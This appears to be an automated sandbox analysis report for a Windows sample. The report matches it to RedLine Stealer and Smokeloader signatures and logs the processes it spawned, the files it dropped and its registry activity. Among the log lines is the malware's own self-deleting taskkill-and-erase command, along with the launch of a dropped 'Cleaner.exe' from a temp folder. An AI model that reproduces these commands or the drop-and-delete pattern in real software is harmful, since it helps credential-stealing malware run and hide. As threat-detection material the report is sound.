Source: 00000000.00000000.248840662.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.280078685.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.279883585.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.284940570.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.252473091.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.248974366.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.260888078.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.242858773.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.249420938.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.279479542.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.279352370.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.252652451.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.242267138.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.256739991.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.284571510.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.267422154.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.266223376.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.253125485.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.265525344.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.261862995.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.242671157.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.285927973.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.261685846.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.260976008.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.253211211.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.257226679.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 532

Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Code function: 30_2_00007FFCA0CB553E
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Code function: 30_2_00007FFCA0CB116B
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Code function: 30_2_00007FFCA0CBA91D
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Code function: 30_2_00007FFCA0CB28C2
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Code function: 30_2_00007FFCA0CB4601
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Code function: 30_2_00007FFCA0CB9B6D
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Code function: 30_2_00007FFCA0CB3F72
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Code function: 30_2_00007FFCA0CB1B2E
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Code function: 30_2_00007FFCA0CB2EE5
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Code function: 30_2_00007FFCA0CB57D8
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Code function: 30_2_00007FFCA0CB4EDD

Source: file.exe

Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79

Source: file.exe, 00000000.00000003.329174439.0000000003B66000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.322735199.0000000003735000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.330761545.0000000003960000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.331371122.0000000003B95000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.323082305.000000000390E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.323416274.0000000003AF9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.328400230.0000000003943000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.324070957.000000000373E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.327501854.0000000003946000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.330045945.0000000003734000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.325291539.000000000392E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.327061375.000000000373D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.327857443.0000000003735000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.326688973.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.332041691.0000000003735000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe

Source: Cleaner.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: soft[1].0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe

ReversingLabs: Detection: 47%

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 532
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 700
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 700
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 720
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 776
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 868
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 880
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 976
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 1268
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe "C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 1556
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "file.exe" /f & erase "C:\Users\user\Desktop\file.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "file.exe" /f
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "file.exe" /f & erase "C:\Users\user\Desktop\file.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe "C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "file.exe" /f

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Source: Cleaner.lnk.0.dr

LNK file: ..\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe

Source: C:\Windows\SysWOW64\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "file.exe")

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn

Jump to behavior

Source: classification engine

Classification label: mal96.troj.winEXE@21/51@1/5

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5112:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6060:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6136

Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: ^\C:\car.pdb source: file.exe
Source:	Binary string: C:\car.pdb source: file.exe

Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Code function: 30_2_00007FFCA0CB2EE5 push ss; iretd
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Code function: 30_2_00007FFCA0CB3384 push ss; iretd
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Code function: 30_2_00007FFCA0CB32F2 push ss; iretd

Source: Cleaner.exe.0.dr

Static PE information: 0xEAE49AF1 [Wed Nov 17 16:40:17 2094 UTC]

Source: initial sample	Static PE information: section name: .text entropy: 7.920922021912582
Source: initial sample	Static PE information: section name: .text entropy: 7.920922021912582

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\dll[1]			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\soft[1]			Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Bunifu_UI_v1.5.3.dll			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\soft[1]			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\dll[1]			Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
